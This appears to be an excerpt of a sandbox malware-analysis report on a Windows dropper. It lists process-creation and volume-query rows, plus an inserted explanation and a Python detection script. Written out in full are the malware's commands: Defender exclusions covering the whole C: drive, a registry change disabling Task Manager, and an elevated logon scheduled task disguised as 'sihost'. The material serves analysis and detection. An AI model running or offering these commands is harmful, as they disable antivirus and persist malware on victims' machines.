Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\fontdriversavescrt\ComComponentDriverInto.exe "C:\fontdriversavescrt/ComComponentDriverInto.exe"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /fJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
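The process-creation rows above are a compact picture of this dropper's tradecraft: a .vbe started by wscript.exe hands off to a .bat, which sets DisableTaskMgr under the per-user Policies\System key and launches ComComponentDriverInto.exe; that binary then spawns one powershell.exe per Add-MpPreference exclusion (the drive root, C:\Windows, C:\Users and its own drop locations), registers an ONLOGON task named "sihost" with /rl HIGHEST that points into Default User\Documents, and relaunches itself from a second .bat whose cmd.exe runs chcp 65001 and w32tm /stripchart against localhost, a common sleep substitute in batch droppers. The Python below is an added example and not part of the Joe Sandbox report: it runs a handful of detection rules over child command lines copied from those rows (embedded as a constructed list) and flags the behaviours the report's signatures describe. The rule names, the list of system-process names expected under System32, the "trusted" path prefixes for task targets and the ATT&CK references in the comments are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed input: child command lines from the "Process created" rows above, trimmed
# to the command itself. In practice feed Sysmon event 1 / Security 4688 command lines.
SAMPLE_COMMAND_LINES = [
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:/'",
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:/Windows/'",
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'",
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'",
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    r'''schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f''',
    r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
    r"chcp 65001",
]

# Assumptions of this example, not taken from the report: system-process names that belong
# only under System32/SysWOW64, and path prefixes treated as trusted for an elevated task.
SYSTEM_PROCESS_NAMES = {"sihost.exe", "wmiprvse.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                        "winlogon.exe", "dllhost.exe", "conhost.exe", "smss.exe", "services.exe"}
EXPECTED_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64",
                 "c:\\windows\\system32\\wbem", "c:\\windows\\syswow64\\wbem"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Whitespace split that keeps "..." and '...' groups, spaces included, as one token.
_TOKEN = re.compile(r'"[^"]*"' + r"|'[^']*'" + r"|\S+")

@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str

def tokenize(cmdline):
    """Tokenize a Windows command line, peeling nested quotes ("'C:\\a b.exe'" -> C:\\a b.exe)."""
    toks = []
    for tok in _TOKEN.findall(cmdline):
        while len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
            tok = tok[1:-1]
        toks.append(tok)
    return toks

def norm(path):
    """Lower-case, backslash-only, no trailing separator: 'C:/Windows/' -> c:\\windows."""
    return path.replace("/", "\\").rstrip("\\").lower()

def masquerading(path):
    """True when a system-process file name sits outside its expected directory."""
    parent, _, name = norm(path).rpartition("\\")
    return name in SYSTEM_PROCESS_NAMES and parent not in EXPECTED_DIRS

def arg_after(toks, low, switch):
    """Value following a switch such as /tr or -ExclusionPath, else None."""
    i = low.index(switch) if switch in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else None

def analyze(cmdline):
    """Return the Findings for one child command line (empty list if nothing fires)."""
    toks = tokenize(cmdline)
    if not toks:
        return []
    low = [t.lower() for t in toks]
    exe = low[0].rpartition("\\")[2]
    findings = []
    # Defender exclusion (T1562.001): a drive root or top-level directory disables scanning beneath it.
    if exe in ("powershell", "powershell.exe", "pwsh", "pwsh.exe") and "add-mppreference" in low:
        target = arg_after(toks, low, "-exclusionpath")
        if target:
            p = norm(target)
            broad = p.count("\\") <= 1 and "." not in p.rpartition("\\")[2]
            findings.append(Finding("defender_broad_exclusion" if broad else "defender_file_exclusion", p))
            if masquerading(p):
                findings.append(Finding("system_name_unexpected_dir", p))
    # Task Manager disabled through the per-user Policies\System key.
    if (exe in ("reg", "reg.exe") and low[1:2] == ["add"] and "disabletaskmgr" in low
            and arg_after(toks, low, "/d") == "1"):
        findings.append(Finding("taskmgr_disabled", toks[2]))
    # Elevated logon task (T1053.005) aimed outside trusted dirs, or at a borrowed system-process name.
    if exe in ("schtasks", "schtasks.exe") and "/create" in low:
        target = arg_after(toks, low, "/tr")
        highest = (arg_after(toks, low, "/rl") or "").lower() == "highest"
        if target and ((highest and not norm(target).startswith(TRUSTED_PREFIXES))
                       or masquerading(target)):
            findings.append(Finding("elevated_task_untrusted_target", norm(target)))
    # w32tm /stripchart against localhost: a common sleep substitute in batch droppers.
    if exe in ("w32tm", "w32tm.exe") and "/stripchart" in low and "/computer:localhost" in low:
        findings.append(Finding("w32tm_sleep", cmdline))
    return findings

def analyze_all(cmdlines):
    """(command line, Finding) pairs for every rule that fires across a process tree."""
    return [(c, f) for c in cmdlines for f in analyze(c)]

def rules_hit(cmdlines):
    """Sorted, de-duplicated rule names: a quick triage verdict for the whole tree."""
    return sorted({f.rule for _, f in analyze_all(cmdlines)})

if __name__ == "__main__":
    for cmd, f in analyze_all(SAMPLE_COMMAND_LINES):
        print(f"[{f.rule}] {f.detail}")
```

Run as a script it prints one line per finding; on real telemetry, a defender_broad_exclusion hit from anything other than an administrator's own session deserves an immediate look, because Get-MpPreference on the host will still list the exclusion until it is removed with Remove-MpPreference, and the ONLOGON task will re-launch the payload with high integrity on the next sign-in regardless of whether the original dropper is cleaned up.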
Source: C:\Users\user\Desktop\KzLetzDiM8.exe Code function: 0_2_001FF654 cpuid 0_2_001FF654
Source: C:\Users\user\Desktop\KzLetzDiM8.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_001FAF0F
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe Queries volume information: C:\fontdriversavescrt\ComComponentDriverInto.exe VolumeInformation
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe Queries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformation
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe Queries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
